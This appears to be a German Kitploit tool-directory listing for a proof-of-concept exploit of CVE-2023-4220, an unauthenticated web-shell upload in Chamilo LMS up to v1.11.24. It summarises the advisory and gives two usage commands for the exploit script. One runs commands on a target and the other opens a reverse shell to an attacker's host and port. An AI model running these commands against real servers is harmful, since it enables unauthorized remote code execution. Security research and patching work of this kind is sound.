Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-4226-POC — POC für CVE-2023-4220 - Chamilo LMS Unauthenticated Big Upload File Remote Code Execution | Kitploit
Tools/GitHubGitHub/krishnan-tech/cve-2023-4226-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubkrishnan-tech/cve-2023-4226-poc

CVE-2023-4226-POC

POC für CVE-2023-4220 - Chamilo LMS Unauthenticated Big Upload File Remote Code Execution

Repository anzeigen
115vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-4220 PoC

Mehr zu CVE-2023-4220: StarLabs Advisory

Zusammenfassung

ProduktChamilo
AnbieterChamilo
SchweregradHoch – Angreifer können Software-Schwachstellen ausnutzen, um eine nicht authentifizierte Remote-Codeausführung zu erlangen.
Betroffene Versionen<= v1.11.24
Getestete Versionenv1.11.24 (zum Zeitpunkt der Erstellung aktuellste Version)
CVE-KennungCVE-2023-4220
CVE-BeschreibungUneingeschränkter Dateiupload in der Funktion zum Hochladen großer Dateien in /main/inc/lib/javascript/bigupload/inc/bigUpload.php in Chamilo LMS <= v1.11.24 ermöglicht nicht authentifizierten Angreifern, gespeicherte Cross-Site-Scripting-Angriffe durchzuführen und durch das Hochladen einer Web-Shell eine Remote-Codeausführung zu erlangen.
CWE-KlassifikationCWE-434: Uneingeschränkter Upload einer Datei mit gefährlichem Typ
CAPEC-KlassifikationCAPEC-650: Hochladen einer Web-Shell auf einen Webserver

Proof of Concept (PoC)

Befehle direkt ausführen

Um Befehle direkt auszuführen, verwenden Sie den folgenden Befehl:

python CVE-2023-4226.py -u http://<target_ip>:<target_port> -c whoami

Eine Reverse-Shell erhalten

Um eine Reverse-Shell zu erhalten, verwenden Sie den folgenden Befehl:

python CVE-2023-4226.py -u http://<target_ip>:<target_port> -lhost <local_ip> -lport <local_port>

Tool herunterladen